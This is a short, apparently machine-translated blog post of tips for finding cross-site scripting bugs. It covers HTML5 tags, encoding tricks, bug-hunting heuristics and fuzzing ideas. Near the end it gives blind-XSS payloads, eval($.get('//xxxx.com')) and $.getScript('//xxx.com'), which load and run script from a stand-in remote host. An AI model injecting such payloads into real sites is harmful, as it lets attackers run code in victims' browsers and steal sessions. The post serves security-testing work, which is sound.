XSS Skills Synthesis

This Saturday will share experience and skills in the company, to put their own and some of the online skills to write some, convenient for everyone and yourself:

Normal XSS, storage, reflection, DOM

The formation of nothing is the output point between the HTML tags, HTML attributes, to become the JS code, called CSS code.

Here are some of my tips:

1. Refer to the new tags, such as chrome in the next version of the new <link rel= "import" href= "Http://xx", we can use him, see Wooyun,qqmail XSS.

Recommended reference is: http://html5sec.org

2. Reference encoding decoding HTML entity encoding, binary encoding, hexadecimal, decimal. Js:unicode encoding, Hex, octal, pure escape. CSS: Octal, Hex.

After use, you will have an unexpected receipt:) Recommended URL: http://evilcos.me/lab/xssee/

3. This is a personal feeling and experience (borrowed from Moster's share):

1) The UI is rotten and the security is poor.

2) from the point of view of the program ape, you think you have to write, which places can not be fully considered thoughtful

3) Rookie to eat back grass, dug before the place to find more, maybe there will be surprise

4) Find the loophole in the place and go to Google again to see if there is a similar business

4. About Automation (learn from Chu Niu's ideas):

1) for storage type, last-modified and ETag

2) Dom:fuzz+hook

5) Blind hit, if using jquery can try the following (thanks cosine and pw Cow):

1) eval ($.get ('//xxxx.com '))

2) $.getscript ('//xxx.com ')//This is the most awesome, I didn't realize, pw actual combat found

If you have any skills welcome to add, if there is a mistake welcome to sevck#jdsec.com

XSS Skills Synthesis